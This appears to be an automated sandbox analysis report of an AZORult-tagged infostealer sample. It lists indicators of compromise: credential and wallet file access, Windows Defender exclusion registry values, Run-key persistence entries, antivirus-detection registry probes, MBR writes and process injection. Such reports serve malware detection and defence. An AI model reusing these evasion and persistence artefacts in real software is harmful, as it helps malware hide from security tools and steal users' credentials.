azorult | dccc4e97a22f1316c84cd46e2056d30ccc843448f3d07efb788512bee8ce8808

System Information Discovery

Processes:

0bnkzgsvvq4.tmpcmd.execmd.execmd.execmd.execmd.execmd.exe21XR7QONM.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	0bnkzgsvvq4.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	21XR7QONM.exe

Loads dropped DLL 64 IoCs

Processes:

MsiExec.exe1371867.15vict.tmpgx2ph5ctpwi.tmpSetup3310.tmpIBInstaller_97039.tmpvpn.tmp0bnkzgsvvq4.tmpSetup.tmpC0CA61A12E4C8B38.exeMiniThunderPlatform.exe5.exePictureLAb.tmpSetup.tmpDelta.tmpzznote.tmph9HCatah8.exeSetup.exerBSob1N4b.exepatch.exemask_svc.exeMaskVPNUpdate.exevict.tmpSetup3310.tmp

pid	process
200	MsiExec.exe
3900	1371867.15
4724	vict.tmp
4936	gx2ph5ctpwi.tmp
4188	Setup3310.tmp
4188	Setup3310.tmp
4384	IBInstaller_97039.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
4400	vpn.tmp
5268	0bnkzgsvvq4.tmp
5268	0bnkzgsvvq4.tmp
5268	0bnkzgsvvq4.tmp
5268	0bnkzgsvvq4.tmp
5268	0bnkzgsvvq4.tmp
5268	0bnkzgsvvq4.tmp
5268	0bnkzgsvvq4.tmp
5420	Setup.tmp
5420	Setup.tmp
2692	C0CA61A12E4C8B38.exe
2692	C0CA61A12E4C8B38.exe
5884	MiniThunderPlatform.exe
5884	MiniThunderPlatform.exe
5884	MiniThunderPlatform.exe
5884	MiniThunderPlatform.exe
5884	MiniThunderPlatform.exe
5884	MiniThunderPlatform.exe
5884	MiniThunderPlatform.exe
4300	5.exe
4212	PictureLAb.tmp
4212	PictureLAb.tmp
5276	Setup.tmp
5632	Delta.tmp
5632	Delta.tmp
3340	zznote.tmp
3340	zznote.tmp
4264	h9HCatah8.exe
4264	h9HCatah8.exe
2376	Setup.exe
2376	Setup.exe
6824	rBSob1N4b.exe
6824	rBSob1N4b.exe
3820	patch.exe
3820	patch.exe
3820	patch.exe
5856	mask_svc.exe
5856	mask_svc.exe
5856	mask_svc.exe
5856	mask_svc.exe
5856	mask_svc.exe
5856	mask_svc.exe
3820	patch.exe
4400	vpn.tmp
4400	vpn.tmp
5552	MaskVPNUpdate.exe
5552	MaskVPNUpdate.exe
5220	vict.tmp
4196	Setup3310.tmp
4196	Setup3310.tmp

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

app.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\EmptyBird = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0"	app.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

multitimer.exeConhost.exesafebits.exegcttt.exe0bnkzgsvvq4.tmp21XR7QONM.exeapp.exe7169117.78

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\at04p2pyoxz = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\SNXE9XJP7P\\multitimer.exe\" 1 3.1614953383.60423ba79bf8a"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Vishizhopilae.exe\""	Conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	safebits.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\3796574 = "\"C:\\Users\\Admin\\AppData\\Roaming\\pbjmu13k454\\0bnkzgsvvq4.exe\" /VERYSILENT"	0bnkzgsvvq4.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\FMQ2XH8834MP1ED = "\"C:\\Program Files\\21XR7QONMO\\21XR7QONM.exe\""	21XR7QONM.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\EmptyBird = "\"C:\\Windows\\rss\\csrss.exe\""	app.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\DragonFruitSoftware = "rundll32.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\DragonFruitSoftware\\tmorgm.dll\",tmorgm 9rr09a 335"	safebits.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	7169117.78

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

Processes:

jg4_4jaa.exejg4_4jaa.exejg4_4jaa.exejg4_4jaa.exemd2_2efs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg4_4jaa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg4_4jaa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg4_4jaa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg4_4jaa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 32 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
76	ip-api.com
847	ip-api.com
1804	ipinfo.io
206	ipinfo.io
607	ipinfo.io
820	ipinfo.io
1813	ipinfo.io
1486	ipinfo.io
1733	ipinfo.io
35	api.ipify.org
262	ip-api.com
599	ipinfo.io
624	ip-api.com
752	ipinfo.io
1587	ip-api.com
1806	ipinfo.io
538	ipinfo.io
750	ipinfo.io
1557	ipinfo.io
1559	ipinfo.io
1566	ipinfo.io
1778	ipinfo.io
131	ipinfo.io
540	ipinfo.io
585	ipinfo.io
798	ipinfo.io
831	ipinfo.io
1537	ipinfo.io
126	ipinfo.io
218	ipinfo.io
232	ipinfo.io
822	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exeMiniThunderPlatform.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe

Drops file in System32 directory 22 IoCs

Processes:

DrvInst.exepowershell.exepowershell.exeDrvInst.exepowershell.exetapinstall.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\oemvista.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\SETB823.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\SETB821.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\SETB821.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\SETB822.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\tap0901.sys	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\SETB822.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{226fc001-d152-5f42-9f99-3446a5a4f754}\SETB823.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

Setup.exemask_svc.exemask_svc.exemask_svc.exe

pid process

3032 Setup.exe
6476 mask_svc.exe
5716 mask_svc.exe
5856 mask_svc.exe

Suspicious use of SetThreadContext 15 IoCs

Processes:

key.exeCC6E.tmp.exeC0CA61A12E4C8B38.exeVenita.exewhiterauf.exeVenita.exewhiterauf.exeVenita.exewhiterauf.exeVenita.exewhiterauf.exeVenita.exewhiterauf.exe

description	pid	process	target process
PID 2220 set thread context of 3164	2220	key.exe	key.exe
PID 4024 set thread context of 3704	4024	CC6E.tmp.exe	CC6E.tmp.exe
PID 2692 set thread context of 3920	2692	C0CA61A12E4C8B38.exe	firefox.exe
PID 2692 set thread context of 4056	2692	C0CA61A12E4C8B38.exe	firefox.exe
PID 2692 set thread context of 4336	2692	C0CA61A12E4C8B38.exe	firefox.exe
PID 68 set thread context of 6480	68	Venita.exe	Venita.exe
PID 3584 set thread context of 6844	3584	whiterauf.exe	whiterauf.exe
PID 6156 set thread context of 2548	6156	Venita.exe	Venita.exe
PID 3324 set thread context of 5576	3324	whiterauf.exe	whiterauf.exe
PID 6436 set thread context of 7268	6436	Venita.exe	Venita.exe
PID 4808 set thread context of 7456	4808	whiterauf.exe	whiterauf.exe
PID 8008 set thread context of 7828	8008	Venita.exe	Venita.exe
PID 3596 set thread context of 7384	3596	whiterauf.exe	whiterauf.exe
PID 8784 set thread context of 2736	8784	Venita.exe	Venita.exe
PID 7596 set thread context of 8048	7596	whiterauf.exe	whiterauf.exe

Drops file in Program Files directory 64 IoCs

Processes:

vict.tmpvpn.tmpchashepro3.tmpchashepro3.tmpprolab.tmpvict.tmpchashepro3.tmpgx2ph5ctpwi.tmpIBInstaller_97039.tmp5n1yv4w4vuz.exevict.tmpchashepro3.tmpchashepro3.tmpConhost.exe

description	ioc	process
File created	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-8OS7A.tmp	vpn.tmp
File created	C:\Program Files (x86)\JCleaner\is-FHO4O.tmp	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceGrid2.dll	prolab.tmp
File created	C:\Program Files (x86)\viewerise\is-H41NK.tmp	vict.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\whiterauf.exe	chashepro3.tmp
File created	C:\Program Files (x86)\MaskVPN\is-R82MO.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-KTTU4.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-0UKG1.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\5.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	gx2ph5ctpwi.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-JA968.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-3D8NH.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-FQ863.tmp	vpn.tmp
File created	C:\Program Files\21XR7QONMO\uninstaller.exe	5n1yv4w4vuz.exe
File created	C:\Program Files (x86)\JCleaner\is-B5P26.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-BF5GJ.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-1ITCI.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Venita.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files\21XR7QONMO\21XR7QONM.exe.config	5n1yv4w4vuz.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-H6FA8.tmp	prolab.tmp
File created	C:\Program Files (x86)\viewerise\is-NP6PJ.tmp	gx2ph5ctpwi.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-HEE84.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\JCleaner\is-0ES9D.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\viewerise\is-84K75.tmp	vict.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\whiterauf.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-MD52H.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\whiterauf.exe	chashepro3.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-2IJTC.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\5.exe	chashepro3.tmp
File created	C:\Program Files (x86)\JCleaner\is-6RRKA.tmp	chashepro3.tmp
File created	C:\Program Files\21XR7QONMO\21XR7QONM.exe	5n1yv4w4vuz.exe
File created	C:\Program Files (x86)\MaskVPN\is-UAM5J.tmp	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-LTA7A.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\JCleaner\is-EMGDG.tmp	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Abbas.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-KN3SD.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-5BQ3P.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\DockingToolbar.dll	prolab.tmp
File created	C:\Program Files (x86)\MaskVPN\is-TSSOP.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-C7BSK.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Picture Lab\is-PCRNJ.tmp	prolab.tmp
File created	C:\Program Files (x86)\JCleaner\is-RRDIO.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\Windows Portable Devices\Vishizhopilae.exe	Conhost.exe
